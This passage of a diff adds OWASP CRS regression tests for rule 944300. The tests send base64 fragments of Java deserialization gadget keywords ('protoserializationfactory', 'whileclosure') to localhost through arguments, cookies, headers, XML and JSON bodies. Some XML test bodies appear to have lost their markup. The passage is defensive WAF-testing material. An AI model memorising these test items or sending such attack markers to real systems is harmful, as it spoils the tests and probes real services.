output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-275 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: 
+ log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-287 + desc: "Argument test includes keyword 
Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-288 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML attribute value includes keyword 
HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
